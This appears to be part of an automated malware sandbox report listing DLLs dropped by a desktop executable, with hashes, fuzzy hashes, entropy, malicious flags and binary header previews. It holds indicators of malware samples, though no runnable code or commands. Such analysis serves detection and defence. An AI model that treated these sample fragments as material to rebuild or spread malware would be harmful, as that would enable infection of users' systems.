                                                                                                                                                                                                                                        SSDEEP:6144:QW1H/M8fRR0mNplkXCRrVADwYCuCigT/Q5MSRqNb7d86:QWN/TRLNLWCRrI55MWavdJ
                                                                                                                                                                                                                                        MD5:8D0619BFE30DEADF6F21196F0F8D53D3
                                                                                                                                                                                                                                        SHA1:E7ABD65A8CCAFEFF6CAF6A2FF98D27D24D87C9AD
                                                                                                                                                                                                                                        SHA-256:B301535DCA491D9814EA28FAA320AC7A19D0F5D94237996FA0A3B5A936432514
                                                                                                                                                                                                                                        SHA-512:5A88E4A06B98832AAA9BBB89E382F6C7E9B65C5ECBA48DE8F4FF1FA58BB06A74B9C2F6B2EC185C2A306CB0B5D68D0B28D74B323432A0B2953D8DFC29FED920D7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10752
                                                                                                                                                                                                                                        Entropy (8bit):4.663205590455457
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:qlTp72HzA5iJewkY0hQMsQJCUCLsZEA4elh3XQMtCFNGioUjQcX6g8cim1qeSju1:ql12HzzjBbRYoesfoRcqgvimoe
                                                                                                                                                                                                                                        MD5:FA50D9F8BCE6BD13652F5090E7B82C4D
                                                                                                                                                                                                                                        SHA1:EE137DA302A43C2F46D4323E98FFD46D92CF4BEF
                                                                                                                                                                                                                                        SHA-256:FFF69928DEA1432E0C7CB1225AB96F94FD38D5D852DE9A6BB8BF30B7D2BEDCEB
                                                                                                                                                                                                                                        SHA-512:341CEC015E74348EAB30D86EBB35C028519703006814A2ECD19B9FE5E6FCB05EDA6DDE0AAF4FE624D254B0D0180EC32ADF3B93EE96295F8F0F4C9D4ED27A7C0C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........=.V\..V\..V\.._$..T\... ..T\...$..T\... ..]\... ..^\... ..U\... ..U\..V\..p\.. ..W\.. ..W\.. z.W\.. ..W\..RichV\..........................PE..d......d.........." ...".....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):115712
                                                                                                                                                                                                                                        Entropy (8bit):5.890497931382238
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:rKLwVA2epJbdfD3NTSGkzsvDNIWN4ZgibPq0kgIWgymA5TGK2MLVur:rKL/dhTMzsbNd9ibPavPA5TGK7Qr
                                                                                                                                                                                                                                        MD5:2D1F2FFD0FECF96A053043DAAD99A5DF
                                                                                                                                                                                                                                        SHA1:B03D5F889E55E802D3802D0F0CAA4D29C538406B
                                                                                                                                                                                                                                        SHA-256:207BBAE9DDF8BDD64E65A8D600FE1DD0465F2AFCD6DC6E28D4D55887CD6CBD13
                                                                                                                                                                                                                                        SHA-512:4F7D68F241A7F581E143A010C78113154072C63ADFF5F200EF67EB34D766D14CE872D53183EB2B96B1895AA9C8D4CA82EE5E61E1C5E655FF5BE56970BE9EBE3E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................o.........................................5...........m...L.....L.......L.......L.......Rich............................PE..d......d.........." ...".(...........,....................................................`.........................................P...d.......................................$...pu..............................0t..@............@...............................text....'.......(.................. ..`.rdata...S...@...T...,..............@..@.data...x8.......,..................@....pdata..............................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6673920
                                                                                                                                                                                                                                        Entropy (8bit):6.582002531606852
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:EzN+T+xtLlk0PPMAiGoTzeDy3x8lGBlWi9Nk:E5Y6Jk0PPMtfTzp3x8c
                                                                                                                                                                                                                                        MD5:486085AAC7BB246A173CEEA0879230AF
                                                                                                                                                                                                                                        SHA1:EF1095843B2A9C6D8285C7D9E8E334A9CE812FAE
                                                                                                                                                                                                                                        SHA-256:C3964FC08E4CA8BC193F131DEF6CC4B4724B18073AA0E12FED8B87C2E627DC83
                                                                                                                                                                                                                                        SHA-512:8A56774A08DA0AB9DD561D21FEBEEBC23A5DEA6F63D5638EA1B608CD923B857DF1F096262865E6EBD56B13EFD3BBA8D714FFDCE8316293229974532C49136460
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......QN.../.../.../...W(../......./......./......./......./...R.../...Z.../..^W.../.../...-../...",......./.../.../......./......./..Rich./..........PE..d...M7ee.........." ...&..M..........L...................................... f...........`......................................... .a.p.....a.|............Pb..............Pe.p...p.[.T.....................[.(...0.[.@............0M..............................text.....M.......M................. ..`.rdata.......0M.......M.............@..@.data........0a.......a.............@....pdata.......Pb.......b.............@..@.reloc..p....Pe.......e.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51712
                                                                                                                                                                                                                                        Entropy (8bit):5.664902275560485
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:cXkHpFLJOXgD7JKgegsvC1wryTXkHjQwDchoPWmzDD/:cXkH/Qswge1WwryTXk8mchoPWmz
                                                                                                                                                                                                                                        MD5:34C2DD52C9E920E035444D6CBDDEB555
                                                                                                                                                                                                                                        SHA1:3FF99987B968261E88032652917F137D4A6A0493
                                                                                                                                                                                                                                        SHA-256:55814D323EE1EC6CD6145AE8F43DBF44D9481E3592AA17B5A17010F7E401FF42
                                                                                                                                                                                                                                        SHA-512:8F0BE0A3E2588BDEFF9F5C4EB728AE43A58A19B91596ADCA0C931D5425A591178F13DCEF68B1B949A2C805E1B9963800397F661688FD3C299D7084EFE45ADAF7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...rx.^rx.^rx.^{.A^px.^..._px.^9.._px.^..._.x.^..._zx.^..._qx.^..._qx.^rx.^.x.^..._sx.^..._sx.^..-^sx.^..._sx.^Richrx.^........................PE..d....jjc.........." ...!.x...V.......{....................................... ............`............................................h...X...d...................................@...................................@...............p............................text...Xv.......x.................. ..`.rdata...1.......2...|..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3445016
                                                                                                                                                                                                                                        Entropy (8bit):6.099467326309974
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:+/+YgEQaGDoWS04ki7x+QRsZ51CPwDv3uFfJx:MLgEXGUZ37x+VZ51CPwDv3uFfJx
                                                                                                                                                                                                                                        MD5:E94733523BCD9A1FB6AC47E10A267287
                                                                                                                                                                                                                                        SHA1:94033B405386D04C75FFE6A424B9814B75C608AC
                                                                                                                                                                                                                                        SHA-256:F20EB4EFD8647B5273FDAAFCEB8CCB2B8BA5329665878E01986CBFC1E6832C44
                                                                                                                                                                                                                                        SHA-512:07DD0EB86498497E693DA0F9DD08DE5B7B09052A2D6754CFBC2AA260E7F56790E6C0A968875F7803CB735609B1E9B9C91A91B84913059C561BFFED5AB2CBB29F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........).h.z.h.z.h.z..Oz.h.z...{.h.z...{.h.z...{.h.z...{.h.z.h.zjh.z...{.h.z=..{.h.z=..{.j.z=..{.h.z=.#z.h.z=..{.h.zRich.h.z........................PE..d.....wd.........." ..."..$...................................................5......o5...`..........................................y/..h...J4.@.....4.|....p2......b4../....4..O..P.,.8.............................,.@............@4..............................text...$.$.......$................. ..`.rdata........$.......$.............@..@.data...!z....1..,....1.............@....pdata..h....p2.......1.............@..@.idata..^#...@4..$....3.............@..@.00cfg..u....p4.......3.............@..@.rsrc...|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):39696
                                                                                                                                                                                                                                        Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                        MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                        SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                        SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                        SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):704792
                                                                                                                                                                                                                                        Entropy (8bit):5.55753143710539
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:ihO7/rNKmrouK/POt6h+7ToRLgo479dQwwLOpWW/dQ0T9qwfU2lvzA:iis/POtrzbLp5dQ0T9qcU2lvzA
                                                                                                                                                                                                                                        MD5:25BDE25D332383D1228B2E66A4CB9F3E
                                                                                                                                                                                                                                        SHA1:CD5B9C3DD6AAB470D445E3956708A324E93A9160
                                                                                                                                                                                                                                        SHA-256:C8F7237E7040A73C2BEA567ACC9CEC373AADD48654AAAC6122416E160F08CA13
                                                                                                                                                                                                                                        SHA-512:CA2F2139BB456799C9F98EF8D89FD7C09D1972FA5DD8FC01B14B7AF00BF8D2C2175FB2C0C41E49A6DAF540E67943AAD338E33C1556FD6040EF06E0F25BFA88FA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........q...q...q.....q..p...q..p...q..t...q..u...q..r...q.[.p...q...p.u.q.[.u...q.[.q...q.[.....q.[.s...q.Rich..q.........................PE..d.....wd.........." ...".D...T......<.....................................................`..........................................A...N..@U..........s........N......./......h.......8...............................@............@..@............................text....B.......D.................. ..`.rdata.../...`...0...H..............@..@.data...AM.......D...x..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............l..............@..@.rsrc...s............n..............@..@.reloc..q............v..............@..B................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):46592
                                                                                                                                                                                                                                        Entropy (8bit):5.344765898080963
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:i005Gi4zzWerZi5s+AP6tzPVtLZ9rthfBie/4jejOcmKnNrODgYMjtNtnlsht6oR:thWu6tVlBiIjnVOIjbMrYyeW
                                                                                                                                                                                                                                        MD5:B92F8EFB672C383AB60B971B3C6C87DE
                                                                                                                                                                                                                                        SHA1:ACB671089A01D7F1DB235719C52E6265DA0F708F
                                                                                                                                                                                                                                        SHA-256:B7376B5D729115A06B1CAB60B251DF3EFC3051EBBA31524EA82F0B8DB5A49A72
                                                                                                                                                                                                                                        SHA-512:680663D6C6CD7B9D63160C282F6D38724BD8B8144D15F430B28B417DDA0222BFFF7AFEFCB671E863D1B4002B154804B1C8AF2D8A28FFF11FA94972B207DF081B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........IT..'...'...'.......'..&...'...&...'.."...'..#...'..$...'.0.&...'...&...'.../...'...'...'.......'...%...'.Rich..'.........PE..d...#X.c.........." ...".Z...^......@^....................................................`.............................................d...T...d...............................L.......................................@............p...............................text....Y.......Z.................. ..`.rdata...+...p...,...^..............@..@.data...h#..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..L...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):143360
                                                                                                                                                                                                                                        Entropy (8bit):6.075135460374895
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:yYjAONgTgGNWARNEBXRzHJ0Xg9sGkD7EKN7Jv1FL/49olpS0mZP0c:nlTmsCD7Z7Jv19/49olY0m10c
                                                                                                                                                                                                                                        MD5:E611E5C516FE1C3670353E3427DA42B9
                                                                                                                                                                                                                                        SHA1:A946ABDEEBE7FA9CCD7AB256C927BE5902784E4A
                                                                                                                                                                                                                                        SHA-256:B4F41659DC3002F70BC6578801AAD771B45F106103441D1E9B4C553C1E50C939
                                                                                                                                                                                                                                        SHA-512:A1C057DBD4B618FDFDD75F70BFE85DBFC6D2A25FED8E74DD5FBF950A02D7470E1F4BFAC8ED00A5CDEF6A68B8737A156A5A0EA443E826C6B30C94554BD7326B99
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..X...........4....@......t.Z....@......@......@............Y.........~.....).........X..........Rich...........................PE..d....2 e.........." ................<.....................................................`.............................................\............`.......@...............p..`.......................................8............................................text...X........................... ..`.rdata..ho.......p..................@..@.data...h.... ......................@....pdata.......@......................@..@.rsrc........`.......(..............@..@.reloc..`....p.......*..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):199448
                                                                                                                                                                                                                                        Entropy (8bit):6.377510350928234
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:OA1YT2Ga6xWK+RohrRoi9+IC08K9YSMJiCNi+GVwlijAOBgC4i9IPLhhHx:v1YOyGohNoEC08K9oJ5GWl7Fi
                                                                                                                                                                                                                                        MD5:9C21A5540FC572F75901820CF97245EC
                                                                                                                                                                                                                                        SHA1:09296F032A50DE7B398018F28EE8086DA915AEBD
                                                                                                                                                                                                                                        SHA-256:2FF8CD82E7CC255E219E7734498D2DEA0C65A5AB29DC8581240D40EB81246045
                                                                                                                                                                                                                                        SHA-512:4217268DB87EEC2F0A14B5881EDB3FDB8EFE7EA27D6DCBEE7602CA4997416C1130420F11167DAC7E781553F3611409FA37650B7C2B2D09F19DC190B17B410BA5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T..5.5.5.Mu..5..I.5..I.5..I.5..I.5..I.5..M.5.5..5..I.5..I.5..I...5..I.5.Rich.5.................PE..d......d.........." ..."............0........................................ .......=....`.............................................P................................/..........`3..T........................... 2..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...@!..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):67352
                                                                                                                                                                                                                                        Entropy (8bit):6.146621901948148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:rw/EsYpkVgBaz57kcDA7QKFmpz7cnzH/ks/KF61xubwmB1Cf//yhC74JFmpktJSy:8/5k8cnzeJf9IPL037SyG3Px
                                                                                                                                                                                                                                        MD5:B711598FC3ED0FE4CF2C7F3E0877979E
                                                                                                                                                                                                                                        SHA1:299C799E5D697834AA2447D8A313588AB5C5E433
                                                                                                                                                                                                                                        SHA-256:520169AA6CF49D7EE724D1178DE1BE0E809E4BDCF671E06F3D422A0DD5FD294A
                                                                                                                                                                                                                                        SHA-512:B3D59EFF5E38CEF651C9603971BDE77BE7231EA8B7BDB444259390A8A9E452E107A0B6CB9CC93E37FD3B40AFB2BA9E67217D648BFCA52F7CDC4B60C7493B6B84
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%{..a.e.a.e.a.e..fm.`.e..fe.`.e..f..`.e..fg.`.e.Richa.e.........................PE..d......d.........." ...".................................................................`.........................................`...P................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5762840
                                                                                                                                                                                                                                        Entropy (8bit):6.089392282930885
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:73djosVvASxQKADxYBVD0NErnKqroleDkcWE/Q3pPITbwVFZL7VgVr42I1vJHH++:73ZOKRtlrJ7wfGrs1BHeM+2PocL2
                                                                                                                                                                                                                                        MD5:5A5DD7CAD8028097842B0AFEF45BFBCF
                                                                                                                                                                                                                                        SHA1:E247A2E460687C607253949C52AE2801FF35DC4A
                                                                                                                                                                                                                                        SHA-256:A811C7516F531F1515D10743AE78004DD627EBA0DC2D3BC0D2E033B2722043CE
                                                                                                                                                                                                                                        SHA-512:E6268E4FAD2CE3EF16B68298A57498E16F0262BF3531539AD013A66F72DF471569F94C6FCC48154B7C3049A3AD15CBFCBB6345DACB4F4ED7D528C74D589C9858
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.D.5.*.5.*.5.*.z.+.7.*.z...;.*.z./.9.*.z...=.*.z.).1.*.<../.*.~.+.>.*.5.+.P.*...'..*...*.4.*.....4.*...(.4.*.Rich5.*.........................PE..d......d.........." ...".X%..47.....\H........................................\.......X...`...........................................@......WA......p[.......V.d0....W../....[..C....).T.............................).@............p%..............................text...rV%......X%................. ..`.rdata.......p%......\%.............@..@.data.........A..L...hA.............@....pdata..d0....V..2....Q.............@..@PyRuntim......X.......S.............@....rsrc........p[......rV.............@..@.reloc...C....[..D...|V.............@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):30480
                                                                                                                                                                                                                                        Entropy (8bit):6.578957517354568
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:N1ecReJKrHqDUI7A700EZ9IPQGNHQIYiSy1pCQn1tPxh8E9VF0NykfF:3eUeJGHqNbD9IPQGR5YiSyvnnPxWEuN
                                                                                                                                                                                                                                        MD5:C97A587E19227D03A85E90A04D7937F6
                                                                                                                                                                                                                                        SHA1:463703CF1CAC4E2297B442654FC6169B70CFB9BF
                                                                                                                                                                                                                                        SHA-256:C4AA9A106381835CFB5F9BADFB9D77DF74338BC66E69183757A5A3774CCDACCF
                                                                                                                                                                                                                                        SHA-512:97784363F3B0B794D2F9FD6A2C862D64910C71591006A34EEDFF989ECCA669AC245B3DFE68EAA6DA621209A3AB61D36E9118EBB4BE4C0E72CE80FAB7B43BDE12
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........tB.t'B.t'B.t'K..'@.t'..u&@.t'..q&N.t'..p&J.t'..w&F.t'..u&@.t'B.u'..t'..u&G.t'..y&C.t'..t&C.t'...'C.t'..v&C.t'RichB.t'................PE..d......d.........." ...".....2............................................................`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1504024
                                                                                                                                                                                                                                        Entropy (8bit):6.578962536427207
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:85Cmr6e6a6Ias3yjWdQty0ok8k378UZk+ZfZ4Se6TOs9CedxnYhR2Au:81/uIasCjWdaHokXk+9Z4Se6TO4dFYL5
                                                                                                                                                                                                                                        MD5:08D50FD2B635972DC84A6FB6FC581C06
                                                                                                                                                                                                                                        SHA1:4BCFC96A1AAD74F7AB11596788ACB9A8D1126064
                                                                                                                                                                                                                                        SHA-256:BB5AC4945B43611C1821FA575AF3152B2937B4BC1A77531136780CC4A28F82E9
                                                                                                                                                                                                                                        SHA-512:8EC536E97D7265F007AD0F99FC8B9EECC9355A63F131B96E8A04E4BD38D3C72E3B80E36E4B1923548BD77EB417C5E0AC6A01D09AF23311784A328FBED3C41084
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K3...R...R...R...*&..R..@....R..@....R..@....R..@....R..D*...R...R...R.......R.......R....J..R.......R..Rich.R..........................PE..d......d.........." ..."............................................................._....`.........................................Px...".............................../...........*..T............................(..@...............8............................text...x........................... ..`.rdata..............................@..@.data...PG.......>..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1141016
                                                                                                                                                                                                                                        Entropy (8bit):5.435086202175289
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:83kYbfjwR6nblonRiPDjRrO5184EPYPx++ZiLKGZ5KXyVH4eD1ol:8UYbMA0IDJcjEwPgPOG6Xyd461ol
                                                                                                                                                                                                                                        MD5:AA13EE6770452AF73828B55AF5CD1A32
                                                                                                                                                                                                                                        SHA1:C01ECE61C7623E36A834D8B3C660E7F28C91177E
                                                                                                                                                                                                                                        SHA-256:8FBED20E9225FF82132E97B4FEFBB5DDBC10C062D9E3F920A6616AB27BB5B0FB
                                                                                                                                                                                                                                        SHA-512:B2EEB9A7D4A32E91084FDAE302953AAC57388A5390F9404D8DFE5C4A8F66CA2AB73253CF5BA4CC55350D8306230DD1114A61E22C23F42FBCC5C0098046E97E0F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................,...............,.....,.....,.y...,.....Rich..........PE..d......d.........." ...".@..........P*...............................................!....`.............................................X............`.......P..0....:.../...p.......]..T............................[..@............P..x............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data...H....0......................@....pdata..0....P.......&..............@..@.rsrc........`......................@..@.reloc.......p.......8..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):109392
                                                                                                                                                                                                                                        Entropy (8bit):6.641929675972235
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
                                                                                                                                                                                                                                        MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
                                                                                                                                                                                                                                        SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
                                                                                                                                                                                                                                        SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
                                                                                                                                                                                                                                        SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
